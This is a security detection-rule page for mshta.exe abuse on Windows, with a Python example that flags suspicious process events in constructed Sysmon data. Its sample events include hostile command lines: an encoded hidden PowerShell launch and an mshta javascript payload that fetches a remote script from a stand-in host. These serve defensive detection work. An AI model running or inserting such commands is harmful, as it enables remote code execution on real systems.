
Summary
This detection rule identifies execution of the mshta.exe process on Windows systems. MSHTA (Microsoft HTML Application Host) is a signed, built-in Windows binary that runs HTML Application (.hta) files and inline script, which makes it a frequently abused living-off-the-land tool for threat actors seeking code execution and defense evasion (ATT&CK T1218.005). The rule matches Sysmon process-creation events (EventCode 1) using filtering criteria in a Splunk query, and is designed to capture not only direct invocations of mshta.exe but also cases where mshta.exe is the parent of a command shell (cmd.exe) or a PowerShell process (T1059.001). By examining the process details and correlating them with tradecraft attributed to groups and malware families such as FIN7 and TrickBot, organizations can improve their detection of this technique. The rule is intended to enable security teams to investigate and respond to potential compromises where MSHTA is leveraged as a vector for executing malicious code or scripts. Some legitimate mshta.exe use exists (for example, administrative .hta tools), so analysts should tune on parent process, command line, and user rather than alert on every launch.
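The logic the summary describes, run over a handful of constructed Sysmon process-creation records, as an added example; this is not the rule's own Splunk query, and the field names (EventCode, process_name, parent_process_name, process, dest, user) are assumed to follow Splunk's Endpoint.Processes conventions. It flags direct mshta.exe launches and command shells or PowerShell spawned by mshta.exe, and additionally (a signal beyond the summary above) mshta.exe started with an inline javascript: or vbscript: payload, which needs no .hta file on disk.

```python
"""Added example: MSHTA execution detection over constructed Sysmon events.

Mirrors the detection described on this page (Sysmon EventCode 1, direct
mshta.exe launches, mshta.exe as parent of cmd.exe/powershell.exe). This is
not the rule's own SPL; field names are an assumption modelled on Splunk's
Endpoint.Processes data model.
"""
from typing import Dict, Iterable, List, Optional

MSHTA = "mshta.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Inline script handlers mshta.exe will execute straight from the command line.
INLINE_SCRIPT_PREFIXES = ("javascript:", "vbscript:")

# Constructed sample events (not real telemetry). Mix of full paths, odd
# casing, a non-process event, and a benign process to exercise the logic.
SAMPLE_EVENTS: List[Dict] = [
    {"EventCode": 1, "dest": "ws01", "user": "alice",
     "process_name": "mshta.exe", "parent_process_name": "explorer.exe",
     "process": 'mshta.exe "C:\\Users\\alice\\AppData\\Local\\Temp\\invoice.hta"'},
    {"EventCode": 1, "dest": "ws01", "user": "alice",
     "process_name": "powershell.exe", "parent_process_name": "mshta.exe",
     "process": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"EventCode": 1, "dest": "ws02", "user": "bob",
     "process_name": "C:\\Windows\\System32\\cmd.exe",
     "parent_process_name": "C:\\Windows\\SysWOW64\\MSHTA.EXE",
     "process": "cmd.exe /c whoami"},
    {"EventCode": 1, "dest": "ws02", "user": "bob",
     "process_name": "notepad.exe", "parent_process_name": "explorer.exe",
     "process": "notepad.exe"},
    # Sysmon EventCode 3 is a network connection, not process creation.
    {"EventCode": 3, "dest": "ws03", "user": "carol",
     "process_name": "mshta.exe", "parent_process_name": "explorer.exe",
     "process": "mshta.exe"},
    {"EventCode": 1, "dest": "ws03", "user": "carol",
     "process_name": "mshta.exe", "parent_process_name": "winword.exe",
     "process": 'mshta.exe javascript:a=GetObject("script:http://example.invalid/x.sct").Exec()'},
]


def _basename(path: str) -> str:
    """Normalise 'C:\\Windows\\System32\\MSHTA.EXE' or 'mshta.exe' to 'mshta.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict) -> Optional[str]:
    """Return a detection reason for one event, or None if it is not interesting."""
    if event.get("EventCode") != 1:  # only Sysmon process-creation events
        return None
    name = _basename(event.get("process_name", ""))
    parent = _basename(event.get("parent_process_name", ""))
    cmdline = event.get("process", "").lower()
    if name == MSHTA:
        if any(prefix in cmdline for prefix in INLINE_SCRIPT_PREFIXES):
            return "mshta_inline_script"
        return "mshta_direct"
    if parent == MSHTA and name in SHELLS:
        return "mshta_spawned_shell"
    return None


def detect_mshta(events: Iterable[Dict]) -> List[Dict]:
    """Run the classifier over a stream of events and return the hits in order."""
    hits = []
    for event in events:
        reason = classify(event)
        if reason is not None:
            hits.append({
                "reason": reason,
                "dest": event.get("dest"),
                "user": event.get("user"),
                "process": event.get("process"),
            })
    return hits


if __name__ == "__main__":
    for hit in detect_mshta(SAMPLE_EVENTS):
        print(f'{hit["reason"]:22} {hit["dest"]} {hit["user"]}: {hit["process"]}')
```

Basename normalisation matters in practice: Sysmon records full image paths and Windows is case-insensitive, so a rule that compares `process_name` to the literal string `mshta.exe` will miss `C:\Windows\SysWOW64\MSHTA.EXE`. The EventCode check is what keeps network, file-create and registry events for the same image from inflating the alert count.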
Categories
- Windows
- Endpoint
Data Sources
- Process
- Windows Registry
ATT&CK Techniques
- T1218.005
- T1059.001
Created: 2024-02-09